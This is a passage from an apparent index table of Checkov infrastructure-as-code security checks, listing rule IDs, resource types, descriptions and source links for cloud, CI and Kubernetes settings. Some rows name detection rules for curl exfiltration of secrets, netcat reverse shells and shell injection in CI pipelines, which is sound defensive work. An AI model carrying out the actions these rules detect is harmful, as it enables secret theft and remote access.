[GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | +| 2417 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | +| 2418 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | +| 2419 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | +| 2420 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | +| 2421 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | +| 2422 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | +| 2423 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | +| 2424 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) | +| 2425 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) | +| 2426 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) | +| 2427 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) | +| 2428 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) | +| 2429 | CKV_GHA_1 | jobs | jobs | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) | +| 2430 | CKV_GHA_1 | jobs | jobs.*.steps[] | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) | +| 2431 | CKV_GHA_2 | jobs | jobs | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) | +| 2432 | CKV_GHA_2 | jobs | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) | +| 2433 | CKV_GHA_3 | jobs | jobs | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) | +| 2434 | CKV_GHA_3 | jobs | jobs.*.steps[] | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) | +| 2435 | CKV_GHA_4 | jobs | jobs | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) | +| 2436 | CKV_GHA_4 | jobs | jobs.*.steps[] | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) | +| 2437 | CKV_GHA_5 | jobs | jobs | Found artifact build without evidence of cosign sign execution in pipeline | github_actions | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py) | +| 2438 | CKV_GHA_6 | jobs | jobs | Found artifact build without evidence of cosign sbom attestation in pipeline | github_actions | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py) | +| 2439 | CKV_GHA_7 | jobs | on | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty. | github_actions | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py) | +| 2440 | CKV2_GHA_1 | resource | permissions | Ensure top-level permissions are not set to write-all | github_actions | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml) | +| 2441 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) | +| 2442 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) | +| 2443 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) | +| 2444 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 2445 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 2446 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) | +| 2447 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | +| 2448 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) | +| 2449 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | +| 2450 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) | +| 2451 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) | +| 2452 | CKV_GITHUB_1 | github_configuration | * | Ensure GitHub organization security settings require 2FA | github_configuration | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py) | +| 2453 | CKV_GITHUB_2 | github_configuration | * | Ensure GitHub organization security settings require SSO | github_configuration | [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py) | +| 2454 | CKV_GITHUB_3 | github_configuration | * | Ensure GitHub organization security settings has IP allow list enabled | github_configuration | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py) | +| 2455 | CKV_GITHUB_4 | github_configuration | * | Ensure GitHub branch protection rules requires signed commits | github_configuration | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py) | +| 2456 | CKV_GITHUB_5 | github_configuration | * | Ensure GitHub branch protection rules does not allow force pushes | github_configuration | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py) | +| 2457 | CKV_GITHUB_6 | github_configuration | * | Ensure GitHub organization webhooks are using HTTPS | github_configuration | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py) | +| 2458 | CKV_GITHUB_7 | github_configuration | * | Ensure GitHub repository webhooks are using HTTPS | github_configuration | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py) | +| 2459 | CKV_GITHUB_8 | github_configuration | * | Ensure GitHub branch protection rules requires linear history | github_configuration | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py) | +| 2460 | CKV_GITHUB_9 | github_configuration | * | Ensure 2 admins are set for each repository | github_configuration | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py) | +| 2461 | CKV_GITHUB_10 | github_configuration | * | Ensure branch protection rules are enforced on administrators | github_configuration | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py) | +| 2462 | CKV_GITHUB_11 | github_configuration | * | Ensure GitHub branch protection dismisses stale review on new commit | github_configuration | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py) | +| 2463 | CKV_GITHUB_12 | github_configuration | * | Ensure GitHub branch protection restricts who can dismiss PR reviews | github_configuration | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py) | +| 2464 | CKV_GITHUB_13 | github_configuration | * | Ensure GitHub branch protection requires CODEOWNER reviews | github_configuration | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py) | +| 2465 | CKV_GITHUB_14 | github_configuration | * | Ensure all checks have passed before the merge of new code | github_configuration | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py) | +| 2466 | CKV_GITHUB_15 | github_configuration | * | Ensure inactive branches are reviewed and removed periodically | github_configuration | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py) | +| 2467 | CKV_GITHUB_16 | github_configuration | * | Ensure GitHub branch protection requires conversation resolution | github_configuration | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py) | +| 2468 | CKV_GITHUB_17 | github_configuration | * | Ensure GitHub branch protection requires push restrictions | github_configuration | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py) | +| 2469 | CKV_GITHUB_18 | github_configuration | * | Ensure GitHub branch protection rules does not allow deletions | github_configuration | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py) | +| 2470 | CKV_GITHUB_19 | github_configuration | * | Ensure any change to code receives approval of two strongly authenticated users | github_configuration | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py) | +| 2471 | CKV_GITHUB_20 | github_configuration | * | Ensure open git branches are up to date before they can be merged into codebase | github_configuration | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py) | +| 2472 | CKV_GITHUB_21 | github_configuration | * | Ensure public repository creation is limited to specific members | github_configuration | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py) | +| 2473 | CKV_GITHUB_22 | github_configuration | * | Ensure private repository creation is limited to specific members | github_configuration | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py) | +| 2474 | CKV_GITHUB_23 | github_configuration | * | Ensure internal repository creation is limited to specific members | github_configuration | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py) | +| 2475 | CKV_GITHUB_26 | github_configuration | * | Ensure minimum admins are set for the organization | github_configuration | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py) | +| 2476 | CKV_GITHUB_27 | github_configuration | * | Ensure strict base permissions are set for repositories | github_configuration | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py) | +| 2477 | CKV_GITHUB_28 | github_configuration | * | Ensure an organization's identity is confirmed with a Verified badge Passed | github_configuration | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py) | +| 2478 | CKV_GITLAB_1 | gitlab_configuration | * | Merge requests should require at least 2 approvals | gitlab_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py) | +| 2479 | CKV_GITLAB_2 | gitlab_configuration | * | Ensure all Gitlab groups require two factor authentication | gitlab_configuration | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py) | +| 2480 | CKV_GITLABCI_1 | jobs | *.script[] | Suspicious use of curl with CI environment variables in script | gitlab_ci | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py) | +| 2481 | CKV_GITLABCI_2 | jobs | *.rules | Avoid creating rules that generate double pipelines | gitlab_ci | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py) | +| 2482 | CKV_GITLABCI_3 | jobs | *.image[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | +| 2483 | CKV_GITLABCI_3 | jobs | *.services[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) | +| 2484 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) | +| 2485 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) | +| 2486 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) | +| 2487 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) | +| 2488 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) | +| 2489 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) | +| 2490 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | +| 2491 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | +| 2492 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | +| 2493 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) | +| 2494 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | +| 2495 | CKV_K8S_1 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host process ID namespace | Kubernetes | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py) | +| 2496 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | +| 2497 | CKV_K8S_2 | resource | PodSecurityPolicy | Do not admit privileged containers | Kubernetes | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py) | +| 2498 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | +| 2499 | CKV_K8S_3 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host IPC namespace | Kubernetes | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py) | +| 2500 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | +| 2501 | CKV_K8S_4 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host network namespace | Kubernetes | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py) | +| 2502 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | +| 2503 | CKV_K8S_5 | resource | PodSecurityPolicy | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py) | +| 2504 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | +| 2505 | CKV_K8S_6 | resource | PodSecurityPolicy | Do not admit root containers | Kubernetes | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py) | +| 2506 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | +| 2507 | CKV_K8S_7 | resource | PodSecurityPolicy | Do not admit containers with the NET_RAW capability | Kubernetes | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py) | +| 2508 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | +| 2509 | CKV_K8S_8 | resource | DaemonSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2510 | CKV_K8S_8 | resource | Deployment | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2511 | CKV_K8S_8 | resource | DeploymentConfig | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2512 | CKV_K8S_8 | resource | Pod | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2513 | CKV_K8S_8 | resource | PodTemplate | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2514 | CKV_K8S_8 | resource | ReplicaSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2515 | CKV_K8S_8 | resource | ReplicationController | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2516 | CKV_K8S_8 | resource | StatefulSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2517 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2518 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2519 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2520 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2521 | CKV_K8S_9 | resource | DaemonSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2522 | CKV_K8S_9 | resource | Deployment | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2523 | CKV_K8S_9 | resource | DeploymentConfig | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2524 | CKV_K8S_9 | resource | Pod | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2525 | CKV_K8S_9 | resource | PodTemplate | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2526 | CKV_K8S_9 | resource | ReplicaSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2527 | CKV_K8S_9 | resource | ReplicationController | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2528 | CKV_K8S_9 | resource | StatefulSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2529 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2530 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2531 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2532 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2533 | CKV_K8S_10 | resource | CronJob | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2534 | CKV_K8S_10 | resource | DaemonSet | CPU requests should be set | Kubernetes | 